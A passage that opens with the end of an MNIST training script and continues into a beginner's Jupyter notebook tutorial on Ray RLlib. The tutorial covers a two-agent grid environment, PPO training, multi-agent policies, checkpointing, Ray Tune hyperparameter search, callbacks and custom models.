x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]
}
)
patience=5000
patience_increase=2
improvement_threshold=0.995
validation_frequency=min(n_train_batches,patience // 2)
best_validation_loss=numpy.inf
test_score=0
start_time=timeit.default_timer()
done_looping=False
epoch=0
while(epochs<n_epochs and (not done_looping)):
epoch += 1
for minibatch_index in range(n_train_batches):
minibatch_avg_cost=train_model(minibatch_index)
iter=(epoch-1)*n_train_batches + minibatch_index
if(iter+1)%validation_frequency==0:
validation_losses=[validate_model(i) for i in range(n_valid_batches)]
this_validation_loss=np.mean(validation_losses)
if this_validation_loss<best_validation_loss:
if this_validation_loss<best_validation_loss*improvement_threshold:
patience=max(patience,iter*patience_increase)
best_validation_loss=this_validation_loss
test_loss=[test_model(i) for i in range(n_test_batches)]
test_score=np.mean(test_loss)
with open('best_model.pkl','wb') as f:
pickle.dump(classifier,f)
if patience<=iter:
done_looping=True
break
end_time=timeit.default_timer()
print(
(
'Optimization complete with best validation score of %f %%,'
'with test performance %f %%'
)
% (best_validation_loss * 100., test_score * 100.)
)
def predict():
classifier = pickle.load(open('best_model.pkl'))
predict_model=function([classifier.input],classifier.y_pred)
dataset='mnist.pkl.gz'
datasets=load_data(dataset)
```
| github_jupyter |
# Hands-on RL with Ray’s RLlib
## A beginner’s tutorial for working with multi-agent environments, models, and algorithms
<img src="images/pitfall.jpg" width=250> <img src="images/tesla.jpg" width=254> <img src="images/forklifts.jpg" width=169> <img src="images/robots.jpg" width=252> <img src="images/dota2.jpg" width=213>
### Overview
“Hands-on RL with Ray’s RLlib” is a beginners tutorial for working with reinforcement learning (RL) environments, models, and algorithms using Ray’s RLlib library. RLlib offers high scalability, a large list of algos to choose from (offline, model-based, model-free, etc..), support for TensorFlow and PyTorch, and a unified API for a variety of applications. This tutorial includes a brief introduction to provide an overview of concepts (e.g. why RL) before proceeding to RLlib (multi- and single-agent) environments, neural network models, hyperparameter tuning, debugging, student exercises, Q/A, and more. All code will be provided as .py files in a GitHub repo.
### Intended Audience
* Python programmers who want to get started with reinforcement learning and RLlib.
### Prerequisites
* Some Python programming experience.
* Some familiarity with machine learning.
* *Helpful, but not required:* Experience in reinforcement learning and Ray.
* *Helpful, but not required:* Experience with TensorFlow or PyTorch.
### Requirements/Dependencies
To get this very notebook up and running on your local machine, you can follow these steps here:
Install conda (https://www.anaconda.com/products/individual)
Then ...
#### Quick `conda` setup instructions (Linux):
```
$ conda create -n rllib python=3.8
$ conda activate rllib
$ pip install ray[rllib]
$ pip install tensorflow # <- either one works!
$ pip install torch # <- either one works!
$ pip install jupyterlab
```
#### Quick `conda` setup instructions (Mac):
```
$ conda create -n rllib python=3.8
$ conda activate rllib
$ pip install cmake "ray[rllib]"
$ pip install tensorflow # <- either one works!
$ pip install torch # <- either one works!
$ pip install jupyterlab
```
#### Quick `conda` setup instructions (Win10):
```
$ conda create -n rllib python=3.8
$ conda activate rllib
$ pip install ray[rllib]
$ pip install [tensorflow|torch] # <- either one works!
$ pip install jupyterlab
$ conda install pywin32
```
Also, for Win10 Atari support, we have to install atari_py from a different source (gym does not support Atari envs on Windows).
```
$ pip install git+https://github.com/Kojoley/atari-py.git
```
### Opening these tutorial files:
```
$ git clone https://github.com/sven1977/rllib_tutorials
$ cd rllib_tutorials
$ jupyter-lab
```
### Key Takeaways
* What is reinforcement learning and why RLlib?
* Core concepts of RLlib: Environments, Trainers, Policies, and Models.
* How to configure, hyperparameter-tune, and parallelize RLlib.
* RLlib debugging best practices.
### Tutorial Outline
1. RL and RLlib in a nutshell.
1. Defining an RL-solvable problem: Our first environment.
1. **Exercise No.1**: Environment loop.
(15min break)
1. Picking an algorithm and training our first RLlib Trainer.
1. Configurations and hyperparameters - Easy tuning with Ray Tune.
1. Fixing our experiment's config - Going multi-agent.
1. The "infinite laptop": Quick intro into how to use RLlib with Anyscale's product.
1. **Exercise No.2**: Run your own Ray RLlib+Tune experiment)
1. Neural network models - Provide your custom models using tf.keras or torch.nn.
(15min break)
1. Deeper dive into RLlib's parallelization architecture.
1. Specifying different compute resources and parallelization options through our config.
1. "Hacking in": Using callbacks to customize the RL loop and generate our own metrics.
1. **Exercise No.3**: Write your own custom callback.
1. "Hacking in (part II)" - Debugging with RLlib and PyCharm.
1. Checking on the "infinite laptop" - Did RLlib learn to solve the problem?
### Other Recommended Readings
* [Reinforcement Learning with RLlib in the Unity Game Engine](https://medium.com/distributed-computing-with-ray/reinforcement-learning-with-rllib-in-the-unity-game-engine-1a98080a7c0d)
<img src="images/unity3d_blog_post.png" width=400>
* [Attention Nets and More with RLlib's Trajectory View API](https://medium.com/distributed-computing-with-ray/attention-nets-and-more-with-rllibs-trajectory-view-api-d326339a6e65)
* [Intro to RLlib: Example Environments](https://medium.com/distributed-computing-with-ray/intro-to-rllib-example-environments-3a113f532c70)
## The RL cycle
<img src="images/rl-cycle.png" width=800>
### Coding/defining our "problem" via an RL environment.
We will use the following (adversarial) multi-agent environment
throughout this tutorial to demonstrate a large fraction of RLlib's
APIs, features, and customization options.
<img src="images/environment.png" width=800>
### A word or two on Spaces:
Spaces are used in ML to describe what possible/valid values inputs and outputs of a neural network can have.
RL environments also use them to describe what their valid observations and actions are.
Spaces are usually defined by their shape (e.g. 84x84x3 RGB images) and datatype (e.g. uint8 for RGB values between 0 and 255).
However, spaces could also be composed of other spaces (see Tuple or Dict spaces) or could be simply discrete with n fixed possible values
(represented by integers). For example, in our game, where each agent can only go up/down/left/right, the action space would be `Discrete(4)`
(no datatype, no shape needs to be defined here). Our observation space will be `MultiDiscrete([n, m])`, where n is the position of the agent observing and m is the position of the opposing agent, so if agent1 starts in the upper left corner and agent2 starts in the bottom right corner, agent1's observation would be: `[0, 63]` (in an 8 x 8 grid) and agent2's observation would be `[63, 0]`.
<img src="images/spaces.png" width=800>
```
# Let's code our multi-agent environment.
import gym
from gym.spaces import Discrete, MultiDiscrete
import numpy as np
import random
from ray.rllib.env.multi_agent_env import MultiAgentEnv
class MultiAgentArena(MultiAgentEnv):
def __init__(self, config=None):
config = config or {}
# Dimensions of the grid.
self.width = config.get("width", 10)
self.height = config.get("height", 10)
# End an episode after this many timesteps.
self.timestep_limit = config.get("ts", 100)
self.observation_space = MultiDiscrete([self.width * self.height,
self.width * self.height])
# 0=up, 1=right, 2=down, 3=left.
self.action_space = Discrete(4)
# Reset env.
self.reset()
def reset(self):
"""Returns initial observation of next(!) episode."""
# Row-major coords.
self.agent1_pos = [0, 0] # upper left corner
self.agent2_pos = [self.height - 1, self.width - 1] # lower bottom corner
# Accumulated rewards in this episode.
self.agent1_R = 0.0
self.agent2_R = 0.0
# Reset agent1's visited fields.
self.agent1_visited_fields = set([tuple(self.agent1_pos)])
# How many timesteps have we done in this episode.
self.timesteps = 0
# Return the initial observation in the new episode.
return self._get_obs()
def step(self, action: dict):
"""
Returns (next observation, rewards, dones, infos) after having taken the given actions.
e.g.
`action={"agent1": action_for_agent1, "agent2": action_for_agent2}`
"""
# increase our time steps counter by 1.
self.timesteps += 1
# An episode is "done" when we reach the time step limit.
is_done = self.timesteps >= self.timestep_limit
# Agent2 always moves first.
# events = [collision|agent1_new_field]
events = self._move(self.agent2_pos, action["agent2"], is_agent1=False)
events |= self._move(self.agent1_pos, action["agent1"], is_agent1=True)
# Useful for rendering.
self.collision = "collision" in events
# Get observations (based on new agent positions).
obs = self._get_obs()
# Determine rewards based on the collected events:
r1 = -1.0 if "collision" in events else 1.0 if "agent1_new_field" in events else -0.5
r2 = 1.0 if "collision" in events else -0.1
self.agent1_R += r1
self.agent2_R += r2
rewards = {
"agent1": r1,
"agent2": r2,
}
# Generate a `done` dict (per-agent and total).
dones = {
"agent1": is_done,
"agent2": is_done,
# special `__all__` key indicates that the episode is done for all agents.
"__all__": is_done,
}
return obs, rewards, dones, {} # <- info dict (not needed here).
def _get_obs(self):
"""
Returns obs dict (agent name to discrete-pos tuple) using each
agent's current x/y-positions.
"""
ag1_discrete_pos = self.agent1_pos[0] * self.width + \
(self.agent1_pos[1] % self.width)
ag2_discrete_pos = self.agent2_pos[0] * self.width + \
(self.agent2_pos[1] % self.width)
return {
"agent1": np.array([ag1_discrete_pos, ag2_discrete_pos]),
"agent2": np.array([ag2_discrete_pos, ag1_discrete_pos]),
}
def _move(self, coords, action, is_agent1):
"""
Moves an agent (agent1 iff is_agent1=True, else agent2) from `coords` (x/y) using the
given action (0=up, 1=right, etc..) and returns a resulting events dict:
Agent1: "new" when entering a new field. "bumped" when having been bumped into by agent2.
Agent2: "bumped" when bumping into agent1 (agent1 then gets -1.0).
"""
orig_coords = coords[:]
# Change the row: 0=up (-1), 2=down (+1)
coords[0] += -1 if action == 0 else 1 if action == 2 else 0
# Change the column: 1=right (+1), 3=left (-1)
coords[1] += 1 if action == 1 else -1 if action == 3 else 0
# Solve collisions.
# Make sure, we don't end up on the other agent's position.
# If yes, don't move (we are blocked).
if (is_agent1 and coords == self.agent2_pos) or (not is_agent1 and coords == self.agent1_pos):
coords[0], coords[1] = orig_coords
# Agent2 blocked agent1 (agent1 tried to run into agent2)
# OR Agent2 bumped into agent1 (agent2 tried to run into agent1)
return {"collision"}
# No agent blocking -> check walls.
if coords[0] < 0:
coords[0] = 0
elif coords[0] >= self.height:
coords[0] = self.height - 1
if coords[1] < 0:
coords[1] = 0
elif coords[1] >= self.width:
coords[1] = self.width - 1
# If agent1 -> "new" if new tile covered.
if is_agent1 and not tuple(coords) in self.agent1_visited_fields:
self.agent1_visited_fields.add(tuple(coords))
return {"agent1_new_field"}
# No new tile for agent1.
return set()
def render(self, mode=None):
print("_" * (self.width + 2))
for r in range(self.height):
print("|", end="")
for c in range(self.width):
field = r * self.width + c % self.width
if self.agent1_pos == [r, c]:
print("1", end="")
elif self.agent2_pos == [r, c]:
print("2", end="")
elif (r, c) in self.agent1_visited_fields:
print(".", end="")
else:
print(" ", end="")
print("|")
print("‾" * (self.width + 2))
print(f"{'!!Collision!!' if self.collision else ''}")
print("R1={: .1f}".format(self.agent1_R))
print("R2={: .1f}".format(self.agent2_R))
print()
env = MultiAgentArena()
obs = env.reset()
# Agent1 will move down, Agent2 moves up.
obs, rewards, dones, infos = env.step(action={"agent1": 2, "agent2": 0})
env.render()
print("Agent1's x/y position={}".format(env.agent1_pos))
print("Agent2's x/y position={}".format(env.agent2_pos))
print("Env timesteps={}".format(env.timesteps))
```
## Exercise No 1
<hr />
<img src="images/exercise1.png" width=400>
In the cell above, we performed a `reset()` and a single `step()` call. To walk through an entire episode, one would normally call `step()` repeatedly (with different actions) until the returned `done` dict has the "agent1" or "agent2" (or "__all__") key set to True. Your task is to write an "environment loop" that runs for exactly one episode using our `MultiAgentArena` class.
Follow these instructions here to get this done.
1. `reset` the already created (variable `env`) environment to get the first (initial) observation.
1. Enter an infinite while loop.
1. Compute the actions for "agent1" and "agent2" calling `DummyTrainer.compute_action([obs])` twice (once for each agent).
1. Put the results of the action computations into an action dict (`{"agent1": ..., "agent2": ...}`).
1. Pass this action dict into the env's `step()` method, just like it's done in the above cell (where we do a single `step()`).
1. Check the returned `dones` dict for True (yes, episode is terminated) and if True, break out of the loop.
**Good luck! :)**
```
class DummyTrainer:
"""Dummy Trainer class used in Exercise #1.
Use its `compute_action` method to get a new action for one of the agents,
given the agent's observation (a single discrete value encoding the field
the agent is currently in).
"""
def compute_action(self, single_agent_obs=None):
# Returns a random action for a single agent.
return np.random.randint(4) # Discrete(4) -> return rand int between 0 and 3 (incl. 3).
dummy_trainer = DummyTrainer()
# Check, whether it's working.
for _ in range(3):
# Get action for agent1 (providing agent1's and agent2's positions).
print("action_agent1={}".format(dummy_trainer.compute_action(np.array([0, 99]))))
# Get action for agent2 (providing agent2's and agent1's positions).
print("action_agent2={}".format(dummy_trainer.compute_action(np.array([99, 0]))))
print()
```
Write your solution code into this cell here:
```
# !LIVE CODING!
# Leave the following as-is. It'll help us with rendering the env in this very cell's output.
import time
from ipywidgets import Output
from IPython import display
import time
out = Output()
display.display(out)
with out:
# Solution to Exercise #1:
# Start coding here inside this `with`-block:
# 1) Reset the env.
# 2) Enter an infinite while loop (to step through the episode).
# 3) Calculate both agents' actions individually, using dummy_trainer.compute_action([individual agent's obs])
# 4) Compile the actions dict from both individual agents' actions.
# 5) Send the actions dict to the env's `step()` method to receive: obs, rewards, dones, info dicts
# 6) We'll do this together: Render the env.
# Don't write any code here (skip directly to 7).
out.clear_output(wait=True)
time.sleep(0.08)
env.render()
# 7) Check, whether the episde is done, if yes, break out of the while loop.
# 8) Run it! :)
```
------------------
## 15 min break :)
------------------
### And now for something completely different:
#### Plugging in RLlib!
```
import numpy as np
import pprint
import ray
# Start a new instance of Ray (when running this tutorial locally) or
# connect to an already running one (when running this tutorial through Anyscale).
ray.init() # Hear the engine humming? ;)
# In case you encounter the following error during our tutorial: `RuntimeError: Maybe you called ray.init twice by accident?`
# Try: `ray.shutdown() + ray.init()` or `ray.init(ignore_reinit_error=True)`
```
### Picking an RLlib algorithm - We'll use PPO throughout this tutorial (one-size-fits-all-kind-of-algo)
<img src="images/rllib_algos.png" width=800>
https://docs.ray.io/en/master/rllib-algorithms.html#available-algorithms-overview
```
# Import a Trainable (one of RLlib's built-in algorithms):
# We use the PPO algorithm here b/c its very flexible wrt its supported
# action spaces and model types and b/c it learns well almost any problem.
from ray.rllib.agents.ppo import PPOTrainer
# Specify a very simple config, defining our environment and some environment
# options (see environment.py).
config = {
"env": MultiAgentArena, # "my_env" <- if we previously have registered the env with `tune.register_env("[name]", lambda config: [returns env object])`.
"env_config": {
"config": {
"width": 10,
"height": 10,
"ts": 100,
},
},
# !PyTorch users!
#"framework": "torch", # If users have chosen to install torch instead of tf.
"create_env_on_driver": True,
}
# Instantiate the Trainer object using above config.
rllib_trainer = PPOTrainer(config=config)
rllib_trainer
```
### Ready to train with RLlib's PPO algorithm
That's it, we are ready to train.
Calling `Trainer.train()` will execute a single "training iteration".
One iteration for most algos involves:
1) sampling from the environment(s)
2) using the sampled data (observations, actions taken, rewards) to update the policy model (neural network), such that it would pick better actions in the future, leading to higher rewards.
Let's try it out:
```
results = rllib_trainer.train()
# Delete the config from the results for clarity.
# Only the stats will remain, then.
del results["config"]
# Pretty print the stats.
pprint.pprint(results)
```
### Going from single policy (RLlib's default) to multi-policy:
So far, our experiment has been ill-configured, because both
agents, which should behave differently due to their different
tasks and reward functions, learn the same policy: the "default_policy",
which RLlib always provides if you don't configure anything else.
Remember that RLlib does not know at Trainer setup time, how many and which agents
the environment will "produce". Agent control (adding agents, removing them, terminating
episodes for agents) is entirely in the Env's hands.
Let's fix our single policy problem and introduce the "multiagent" API.
<img src="images/from_single_agent_to_multi_agent.png" width=800>
In order to turn on RLlib's multi-agent functionality, we need two things:
1. A policy mapping function, mapping agent IDs (e.g. a string like "agent1", produced by the environment in the returned observation/rewards/dones-dicts) to a policy ID (another string, e.g. "policy1", which is under our control).
1. A policies definition dict, mapping policy IDs (e.g. "policy1") to 4-tuples consisting of 1) policy class (None for using the default class), 2) observation space, 3) action space, and 4) config overrides (empty dict for no overrides and using the Trainer's main config dict).
Let's take a closer look:
```
# Define the policies definition dict:
# Each policy in there is defined by its ID (key) mapping to a 4-tuple (value):
# - Policy class (None for using the "default" class, e.g. PPOTFPolicy for PPO+tf or PPOTorchPolicy for PPO+torch).
# - obs-space (we get this directly from our already created env object).
# - act-space (we get this directly from our already created env object).
# - config-overrides dict (leave empty for using the Trainer's config as-is)
policies = {
"policy1": (None, env.observation_space, env.action_space, {}),
"policy2": (None, env.observation_space, env.action_space, {"lr": 0.0002}),
}
# Note that now we won't have a "default_policy" anymore, just "policy1" and "policy2".
# Define an agent->policy mapping function.
# Which agents (defined by the environment) use which policies (defined by us)?
# The mapping here is M (agents) -> N (policies), where M >= N.
def policy_mapping_fn(agent_id: str):
# Make sure agent ID is valid.
assert agent_id in ["agent1", "agent2"], f"ERROR: invalid agent ID {agent_id}!"
# Map agent1 to policy1, and agent2 to policy2.
return "policy1" if agent_id == "agent1" else "policy2"
# We could - if we wanted - specify, which policies should be learnt (by default, RLlib learns all).
# Non-learnt policies will be frozen and not updated:
# policies_to_train = ["policy1", "policy2"]
# Adding the above to our config.
config.update({
"multiagent": {
"policies": policies,
"policy_mapping_fn": policy_mapping_fn,
# We'll leave this empty: Means, we train both policy1 and policy2.
# "policies_to_train": policies_to_train,
},
})
pprint.pprint(config)
print()
print(f"agent1 is now mapped to {policy_mapping_fn('agent1')}")
print(f"agent2 is now mapped to {policy_mapping_fn('agent2')}")
# Recreate our Trainer (we cannot just change the config on-the-fly).
rllib_trainer.stop()
# Using our updated (now multiagent!) config dict.
rllib_trainer = PPOTrainer(config=config)
rllib_trainer
```
Now that we are setup correctly with two policies as per our "multiagent" config, let's call `train()` on the new Trainer several times (what about 10 times?).
```
# Run `train()` n times. Repeatedly call `train()` now to see rewards increase.
# Move on once you see (agent1 + agent2) episode rewards of 10.0 or more.
for _ in range(10):
results = rllib_trainer.train()
print(f"Iteration={rllib_trainer.iteration}: R(\"return\")={results['episode_reward_mean']}")
# Do another loop, but this time, we will print out each policies' individual rewards.
for _ in range(10):
results = rllib_trainer.train()
r1 = results['policy_reward_mean']['policy1']
r2 = results['policy_reward_mean']['policy2']
r = r1 + r2
print(f"Iteration={rllib_trainer.iteration}: R(\"return\")={r} R1={r1} R2={r2}")
```
#### !OPTIONAL HACK! (<-- we will not do these during the tutorial, but feel free to try these cells by yourself)
Use the above solution of Exercise #1 and replace our `dummy_trainer` in that solution
with the now trained `rllib_trainer`. You should see a better performance of the two agents.
However, keep in mind that we are mostly training agent1 as we only trian a single policy and agent1
is the "easier" one to collect high rewards with.
#### !OPTIONAL HACK!
Feel free to play around with the following code in order to learn how RLlib - under the hood - calculates actions from the environment's observations using Policies and their model(s) inside our Trainer object):
```
# Let's actually "look inside" our Trainer to see what's in there.
from ray.rllib.utils.numpy import softmax
# To get to one of the policies inside the Trainer, use `Trainer.get_policy([policy ID])`:
policy = rllib_trainer.get_policy("policy1")
print(f"Our (only!) Policy right now is: {policy}")
# To get to the model inside any policy, do:
model = policy.model
#print(f"Our Policy's model is: {model}")
# Print out the policy's action and observation spaces.
print(f"Our Policy's observation space is: {policy.observation_space}")
print(f"Our Policy's action space is: {policy.action_space}")
# Produce a random obervation (B=1; batch of size 1).
obs = np.array([policy.observation_space.sample()])
# Alternatively for PyTorch:
#import torch
#obs = torch.from_numpy(obs)
# Get the action logits (as tf tensor).
# If you are using torch, you would get a torch tensor here.
logits, _ = model({"obs": obs})
logits
# Numpyize the tensor by running `logits` through the Policy's own tf.Session.
logits_np = policy.get_session().run(logits)
# For torch, you can simply do: `logits_np = logits.detach().cpu().numpy()`.
# Convert logits into action probabilities and remove the B=1.
action_probs = np.squeeze(softmax(logits_np))
# Sample an action, using the probabilities.
action = np.random.choice([0, 1, 2, 3], p=action_probs)
# Print out the action.
print(f"sampled action={action}")
```
### Saving and restoring a trained Trainer.
Currently, `rllib_trainer` is in an already trained state.
It holds optimized weights in its Policy's model that allow it to act
already somewhat smart in our environment when given an observation.
However, if we closed this notebook right now, all the effort would have been for nothing.
Let's therefore save the state of our trainer to disk for later!
```
# We use the `Trainer.save()` method to create a checkpoint.
checkpoint_file = rllib_trainer.save()
print(f"Trainer (at iteration {rllib_trainer.iteration} was saved in '{checkpoint_file}'!")
# Here is what a checkpoint directory contains:
print("The checkpoint directory contains the following files:")
import os
os.listdir(os.path.dirname(checkpoint_file))
```
### Restoring and evaluating a Trainer
In the following cell, we'll learn how to restore a saved Trainer from a checkpoint file.
We'll also evaluate a completely new Trainer (should act more or less randomly) vs an already trained one (the one we just restored from the created checkpoint file).
```
# Pretend, we wanted to pick up training from a previous run:
new_trainer = PPOTrainer(config=config)
# Evaluate the new trainer (this should yield random results).
results = new_trainer.evaluate()
print(f"Evaluating new trainer: R={results['evaluation']['episode_reward_mean']}")
# Restoring the trained state into the `new_trainer` object.
print(f"Before restoring: Trainer is at iteration={new_trainer.iteration}")
new_trainer.restore(checkpoint_file)
print(f"After restoring: Trainer is at iteration={new_trainer.iteration}")
# Evaluate again (this should yield results we saw after having trained our saved agent).
results = new_trainer.evaluate()
print(f"Evaluating restored trainer: R={results['evaluation']['episode_reward_mean']}")
```
In order to release all resources from a Trainer, you can use a Trainer's `stop()` method.
You should definitley run this cell as it frees resources that we'll need later in this tutorial, when we'll do parallel hyperparameter sweeps.
```
rllib_trainer.stop()
new_trainer.stop()
```
### Moving stuff to the professional level: RLlib in connection w/ Ray Tune
Running any experiments through Ray Tune is the recommended way of doing things with RLlib. If you look at our
<a href="https://github.com/ray-project/ray/tree/master/rllib/examples">examples scripts folder</a>, you will see that almost all of the scripts use Ray Tune to run the particular RLlib workload demonstrated in each script.
<img src="images/rllib_and_tune.png" width=400>
When setting up hyperparameter sweeps for Tune, we'll do this in our already familiar config dict.
So let's take a quick look at our PPO algo's default config to understand, which hyperparameters we may want to play around with:
```
# Configuration dicts and Ray Tune.
# Where are the default configuration dicts stored?
# PPO algorithm:
from ray.rllib.agents.ppo import DEFAULT_CONFIG as PPO_DEFAULT_CONFIG
print(f"PPO's default config is:")
pprint.pprint(PPO_DEFAULT_CONFIG)
# DQN algorithm:
#from ray.rllib.agents.dqn import DEFAULT_CONFIG as DQN_DEFAULT_CONFIG
#print(f"DQN's default config is:")
#pprint.pprint(DQN_DEFAULT_CONFIG)
# Common (all algorithms).
#from ray.rllib.agents.trainer import COMMON_CONFIG
#print(f"RLlib Trainer's default config is:")
#pprint.pprint(COMMON_CONFIG)
```
### Let's do a very simple grid-search over two learning rates with tune.run().
In particular, we will try the learning rates 0.00005 and 0.5 using `tune.grid_search([...])`
inside our config dict:
```
# Plugging in Ray Tune.
# Note that this is the recommended way to run any experiments with RLlib.
# Reasons:
# - Tune allows you to do hyperparameter tuning in a user-friendly way
# and at large scale!
# - Tune automatically allocates needed resources for the different
# hyperparam trials and experiment runs on a cluster.
from ray import tune
# Running stuff with tune, we can re-use the exact
# same config that we used when working with RLlib directly!
tune_config = config.copy()
# Let's add our first hyperparameter search via our config.
# How about we try two different learning rates? Let's say 0.00005 and 0.5 (ouch!).
tune_config["lr"] = tune.grid_search([0.0001, 0.5]) # <- 0.5? again: ouch!
tune_config["train_batch_size"] = tune.grid_search([3000, 4000])
# Now that we will run things "automatically" through tune, we have to
# define one or more stopping criteria.
# Tune will stop the run, once any single one of the criteria is matched (not all of them!).
stop = {
# Note that the keys used here can be anything present in the above `rllib_trainer.train()` output dict.
"training_iteration": 5,
"episode_reward_mean": 20.0,
}
# "PPO" is a registered name that points to RLlib's PPOTrainer.
# See `ray/rllib/agents/registry.py`
# Run a simple experiment until one of the stopping criteria is met.
tune.run(
"PPO",
config=tune_config,
stop=stop,
# Note that no trainers will be returned from this call here.
# Tune will create n Trainers internally, run them in parallel and destroy them at the end.
# However, you can ...
checkpoint_at_end=True, # ... create a checkpoint when done.
checkpoint_freq=10, # ... create a checkpoint every 10 training iterations.
)
```
### Why did we use 6 CPUs in the tune run above (3 CPUs per trial)?
PPO - by default - uses 2 "rollout" workers (`num_workers=2`). These are Ray Actors that have their own environment copy(ies) and step through those in parallel. On top of these two "rollout" workers, every Trainer in RLlib always also has a "local" worker, which - in case of PPO - handles the learning updates. This gives us 3 workers (2 rollout + 1 local learner), which require 3 CPUs.
## Exercise No 2
<hr />
Using the `tune_config` that we have built so far, let's run another `tune.run()`, but apply the following changes to our setup this time:
- Setup only 1 learning rate under the "lr" config key. Chose the (seemingly) best value from the run in the previous cell (the one that yielded the highest avg. reward).
- Setup only 1 train batch size under the "train_batch_size" config key. Chose the (seemingly) best value from the run in the previous cell (the one that yielded the highest avg. reward).
- Set `num_workers` to 5, which will allow us to run more environment "rollouts" in parallel and to collect training batches more quickly.
- Set the `num_envs_per_worker` config parameter to 5. This will clone our env on each rollout worker, and thus parallelize action computing forward passes through our neural networks.
Other than that, use the exact same args as in our `tune.run()` call in the previous cell.
**Good luck! :)**
```
# !LIVE CODING!
# Solution to Exercise #2
# Run for longer this time (100 iterations) and try to reach 40.0 reward (sum of both agents).
stop = {
"training_iteration": 180, # we have the 15min break now to run this many iterations
"episode_reward_mean": 60.0, # sum of both agents' rewards. Probably won't reach it, but we should try nevertheless :)
}
# tune_config.update({
# ???
# })
# analysis = tune.run(...)
```
------------------
## 15 min break :)
------------------
(while the above experiment is running (and hopefully learning))
## How do we extract any checkpoint from a trial of a tune.run?
```
# The previous tune.run (the one we did before the exercise) returned an Analysis object, from which we can access any checkpoint
# (given we set checkpoint_freq or checkpoint_at_end to reasonable values) like so:
print(analysis)
# Get all trials (we only have one).
trials = analysis.trials
# Assuming, the first trial was the best, we'd like to extract this trial's best checkpoint "":
best_checkpoint = analysis.get_best_checkpoint(trial=trials[0], metric="episode_reward_mean", mode="max")
print(f"Found best checkpoint for trial #2: {best_checkpoint}")
# Undo the grid-search config, which RLlib doesn't understand.
rllib_config = tune_config.copy()
rllib_config["lr"] = 0.00005
rllib_config["train_batch_size"] = 4000
# Restore a RLlib Trainer from the checkpoint.
new_trainer = PPOTrainer(config=rllib_config)
new_trainer.restore(best_checkpoint)
new_trainer
out = Output()
display.display(out)
with out:
obs = env.reset()
while True:
a1 = new_trainer.compute_action(obs["agent1"], policy_id="policy1")
a2 = new_trainer.compute_action(obs["agent2"], policy_id="policy2")
actions = {"agent1": a1, "agent2": a2}
obs, rewards, dones, _ = env.step(actions)
out.clear_output(wait=True)
env.render()
time.sleep(0.07)
if dones["agent1"] is True:
break
```
## Let's talk about customization options
### Deep Dive: How do we customize RLlib's RL loop?
RLlib offers a callbacks API that allows you to add custom behavior to
all major events during the environment sampling- and learning process.
**Our problem:** So far, we can only see standard stats, such as rewards, episode lengths, etc..
This does not give us enough insights sometimes into important questions, such as: How many times
have both agents collided? or How many times has agent1 discovered a new field?
In the following cell, we will create custom callback "hooks" that will allow us to
add these stats to the returned metrics dict, and which will therefore be displayed in tensorboard!
For that we will override RLlib's DefaultCallbacks class and implement the
`on_episode_start`, `on_episode_step`, and `on_episode_end` methods therein:
```
# Override the DefaultCallbacks with your own and implement any methods (hooks)
# that you need.
from ray.rllib.agents.callbacks import DefaultCallbacks
from ray.rllib.evaluation.episode import MultiAgentEpisode
class MyCallbacks(DefaultCallbacks):
def on_episode_start(self,
*,
worker,
base_env,
policies,
episode: MultiAgentEpisode,
env_index,
**kwargs):
# We will use the `MultiAgentEpisode` object being passed into
# all episode-related callbacks. It comes with a user_data property (dict),
# which we can write arbitrary data into.
# At the end of an episode, we'll transfer that data into the `hist_data`, and `custom_metrics`
# properties to make sure our custom data is displayed in TensorBoard.
# The episode is starting:
# Set per-episode object to capture, which states (observations)
# have been visited by agent1.
episode.user_data["new_fields_discovered"] = 0
# Set per-episode agent2-blocks counter (how many times has agent2 blocked agent1?).
episode.user_data["num_collisions"] = 0
def on_episode_step(self,
*,
worker,
base_env,
episode: MultiAgentEpisode,
env_index,
**kwargs):
# Get both rewards.
ag1_r = episode.prev_reward_for("agent1")
ag2_r = episode.prev_reward_for("agent2")
# Agent1 discovered a new field.
if ag1_r == 1.0:
episode.user_data["new_fields_discovered"] += 1
# Collision.
elif ag2_r == 1.0:
episode.user_data["num_collisions"] += 1
def on_episode_end(self,
*,
worker,
base_env,
policies,
episode: MultiAgentEpisode,
env_index,
**kwargs):
# Episode is done:
# Write scalar values (sum over rewards) to `custom_metrics` and
# time-series data (rewards per time step) to `hist_data`.
# Both will be visible then in TensorBoard.
episode.custom_metrics["new_fields_discovered"] = episode.user_data["new_fields_discovered"]
episode.custom_metrics["num_collisions"] = episode.user_data["num_collisions"]
# Setting up our config to point to our new custom callbacks class:
config = {
"env": MultiAgentArena,
"callbacks": MyCallbacks, # by default, this would point to `rllib.agents.callbacks.DefaultCallbacks`, which does nothing.
"num_workers": 5, # we know now: this speeds up things!
}
tune.run(
"PPO",
config=config,
stop={"training_iteration": 20},
checkpoint_at_end=True,
# If you'd like to restore the tune run from an existing checkpoint file, you can do the following:
#restore="/Users/sven/ray_results/PPO/PPO_MultiAgentArena_fd451_00000_0_2021-05-25_15-13-26/checkpoint_000010/checkpoint-10",
)
```
### Let's check tensorboard for the new custom metrics!
1. Head over to the Anyscale project view and click on the "TensorBoard" butten:
<img src="images/tensorboard_button.png" width=1000>
Alternatively - if you ran this locally on your own machine:
1. Head over to ~/ray_results/PPO/PPO_MultiAgentArena_[some key]_00000_0_[date]_[time]/
1. In that directory, you should see a `event.out....` file.
1. Run `tensorboard --logdir .` and head to https://localhost:6006
<img src="images/tensorboard.png" width=800>
### Deep Dive: Writing custom Models in tf or torch.
```
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.framework import try_import_tf, try_import_torch
tf1, tf, tf_version = try_import_tf()
torch, nn = try_import_torch()
# Custom Neural Network Models.
class MyKerasModel(TFModelV2):
"""Custom model for policy gradient algorithms."""
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
"""Build a simple [16, 16]-MLP (+ value branch)."""
super(MyKerasModel, self).__init__(obs_space, action_space,
num_outputs, model_config, name)
# Keras Input layer.
self.inputs = tf.keras.layers.Input(
shape=obs_space.shape, name="observations")
# Hidden layer (shared by action logits outputs and value output).
layer_1 = tf.keras.layers.Dense(
16,
name="layer1",
activation=tf.nn.relu)(self.inputs)
# Action logits output.
logits = tf.keras.layers.Dense(
num_outputs,
name="out",
activation=None)(layer_1)
# "Value"-branch (single node output).
# Used by several RLlib algorithms (e.g. PPO) to calculate an observation's value.
value_out = tf.keras.layers.Dense(
1,
name="value",
activation=None)(layer_1)
# The actual Keras model:
self.base_model = tf.keras.Model(self.inputs,
[logits, value_out])
